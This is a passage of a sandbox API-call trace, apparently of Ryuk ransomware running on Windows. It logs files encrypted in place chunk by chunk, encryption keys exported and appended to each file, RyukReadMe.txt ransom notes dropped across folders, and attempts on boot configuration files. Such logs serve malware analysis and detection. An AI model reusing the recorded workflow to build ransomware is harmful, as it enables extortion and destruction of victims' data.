lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.846] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.846] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.852] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.852] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.854] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.854] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.868] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.868] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.874] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.874] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.876] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.876] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.898] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.898] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.903] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.903] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.906] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0160.906] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.921] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.921] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.926] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0160.926] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.929] SetFilePointer (in: hFile=0x18c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0160.929] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.950] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.950] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.955] SetFilePointer (in: hFile=0x18c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0160.955] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.958] SetFilePointer (in: hFile=0x18c, lDistanceToMove=5000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4c4b40 [0160.958] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x0, lpOverlapped=0x0) returned 1 [0160.958] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.958] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10) returned 1 [0160.958] SetFilePointer (in: hFile=0x18c, lDistanceToMove=5000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4c4b40 [0160.958] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10, lpOverlapped=0x0) returned 1 [0160.958] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0160.958] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0xa, lpOverlapped=0x0) returned 1 [0160.959] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.959] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.959] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.959] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0160.959] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac888*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesWritten=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0160.959] CloseHandle (hObject=0x18c) returned 1 [0160.959] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.963] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.963] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.963] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0160.963] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.963] SetLastError (dwErrCode=0x0) [0160.963] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\RyukReadMe.txt" (normalized: "c:\\users\\public\\videos\\sample videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.963] GetLastError () returned 0x0 [0160.964] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0160.964] CloseHandle (hObject=0x188) returned 1 [0160.964] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0160.964] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.964] SetLastError (dwErrCode=0x0) [0160.965] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\RyukReadMe.txt" (normalized: "c:\\users\\public\\videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.965] GetLastError () returned 0xb7 [0160.965] CloseHandle (hObject=0x184) returned 1 [0160.965] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.965] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0160.965] SetLastError (dwErrCode=0x0) [0160.965] CreateFileW (lpFileName="C:\\Users\\Public\\RyukReadMe.txt" (normalized: "c:\\users\\public\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0160.965] GetLastError () returned 0xb7 [0160.965] CloseHandle (hObject=0x180) returned 1 [0160.965] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0 [0160.965] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0160.965] SetLastError (dwErrCode=0x0) [0160.965] CreateFileW (lpFileName="C:\\Users\\RyukReadMe.txt" (normalized: "c:\\users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.965] GetLastError () returned 0x5 [0160.965] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.965] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.965] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 0 [0160.965] FindClose (in: hFindFile=0x3bcd90 | out: hFindFile=0x3bcd90) returned 1 [0160.965] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0160.965] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0160.965] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0160.966] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0160.966] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0160.966] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0160.966] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 0x3a2d00 [0160.966] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.966] SetLastError (dwErrCode=0x0) [0160.966] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.966] GetLastError () returned 0x5 [0160.966] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.966] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0x3a2d60 [0160.966] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.966] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.966] SetFileAttributesW (lpFileName="C:\\Boot\\BCD", dwFileAttributes=0x80) returned 0 [0160.967] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.967] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.967] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.967] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.968] SetFileAttributesW (lpFileName="C:\\Boot\\BCD.LOG", dwFileAttributes=0x80) returned 0 [0160.968] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.968] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.968] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.968] SetFileAttributesW (lpFileName="C:\\Boot\\BCD.LOG1", dwFileAttributes=0x80) returned 0 [0160.968] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.968] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.969] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.969] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.969] SetFileAttributesW (lpFileName="C:\\Boot\\BCD.LOG2", dwFileAttributes=0x80) returned 0 [0160.969] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.969] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.969] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.969] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.969] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.969] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x80) returned 0 [0160.969] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.970] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.970] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.970] SetLastError (dwErrCode=0x0) [0160.970] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.970] GetLastError () returned 0x5 [0160.970] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.970] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.970] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.970] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.970] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.970] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.970] SetLastError (dwErrCode=0x0) [0160.970] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\RyukReadMe.txt" (normalized: "c:\\boot\\cs-cz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.971] GetLastError () returned 0x5 [0160.971] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.971] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.971] SetLastError (dwErrCode=0x0) [0160.971] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.971] GetLastError () returned 0x5 [0160.971] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.971] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.971] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.971] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.971] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.971] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.971] SetLastError (dwErrCode=0x0) [0160.971] CreateFileW (lpFileName="C:\\Boot\\da-DK\\RyukReadMe.txt" (normalized: "c:\\boot\\da-dk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.971] GetLastError () returned 0x5 [0160.971] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.971] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.971] SetLastError (dwErrCode=0x0) [0160.972] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.972] GetLastError () returned 0x5 [0160.972] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.972] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.972] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.972] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.972] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.972] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.972] SetLastError (dwErrCode=0x0) [0160.972] CreateFileW (lpFileName="C:\\Boot\\de-DE\\RyukReadMe.txt" (normalized: "c:\\boot\\de-de\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.972] GetLastError () returned 0x5 [0160.972] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.972] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.972] SetLastError (dwErrCode=0x0) [0160.972] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.972] GetLastError () returned 0x5 [0160.972] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.973] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.973] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.973] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.973] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0160.973] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.973] SetLastError (dwErrCode=0x0) [0160.973] CreateFileW (lpFileName="C:\\Boot\\el-GR\\RyukReadMe.txt" (normalized: "c:\\boot\\el-gr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.973] 